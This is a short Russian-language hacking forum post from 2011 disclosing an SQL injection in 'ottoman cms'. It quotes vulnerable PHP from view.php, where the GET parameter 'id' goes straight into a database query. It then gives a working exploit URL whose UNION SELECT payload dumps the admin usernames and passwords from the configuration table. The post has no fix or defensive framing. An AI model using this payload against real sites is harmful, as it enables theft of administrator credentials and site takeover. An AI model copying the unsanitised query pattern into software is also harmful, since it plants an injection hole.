23.08.2011, 14:27
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
ottoman cms[SQL-Injection]
view.php
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
include[/COLOR][COLOR="#DD0000"]'header.php'[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#FF8000"]// Detect If User Is Logged In
[/COLOR][COLOR="#007700"]if (empty([/COLOR][COLOR="#0000BB"]$logged_in[/COLOR][COLOR="#007700"])) {[/COLOR][COLOR="#0000BB"]$login_form[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"form"[/COLOR][COLOR="#007700"]; include[/COLOR][COLOR="#DD0000"]'login.php'[/COLOR][COLOR="#007700"]; }
else {
[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$type[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'type'[/COLOR][COLOR="#007700"]];
switch([/COLOR][COLOR="#0000BB"]$type[/COLOR][COLOR="#007700"])
{
case[/COLOR][COLOR="#0000BB"]article[/COLOR][COLOR="#007700"]:
[/COLOR][COLOR="#FF8000"]// Top Menu
[/COLOR][COLOR="#007700"]echo[/COLOR][COLOR="#DD0000"]"Article Viewer"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$article_sql[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT * FROM articles WHERE id = '[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#DD0000"]'"[/COLOR][COLOR="#007700"]);
while([/COLOR][COLOR="#0000BB"]$article[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_fetch_array[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$article_sql[/COLOR][COLOR="#007700"])){
[/COLOR][COLOR="#0000BB"]$article[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]Article[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$article[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]id[/COLOR][COLOR="#007700"]]);
[/COLOR][COLOR="#0000BB"]$article[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]show[/COLOR][COLOR="#007700"]();
echo[/COLOR][COLOR="#DD0000"]"
[/COLOR][COLOR="#0000BB"]$article[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]article_name[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"];
if ([/COLOR][COLOR="#0000BB"]$article[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]article_status[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]"private"[/COLOR][COLOR="#007700"]) { echo[/COLOR][COLOR="#DD0000"]" [private]"[/COLOR][COLOR="#007700"]; }
if ([/COLOR][COLOR="#0000BB"]$article[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]article_status[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]"draft"[/COLOR][COLOR="#007700"]) { echo[/COLOR][COLOR="#DD0000"]" [draft]"[/COLOR][COLOR="#007700"]; }
...[/COLOR][/COLOR]
exploit:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//temp/veiw.php?type=article&id=1+UNION+SELECT+1,group_concat(admin_user,0x3a,admin_pass+SEPARATOR+0x3c62723e),3,4,5,6,7+FROM+configuration+--
[/COLOR][/COLOR]
|
|
|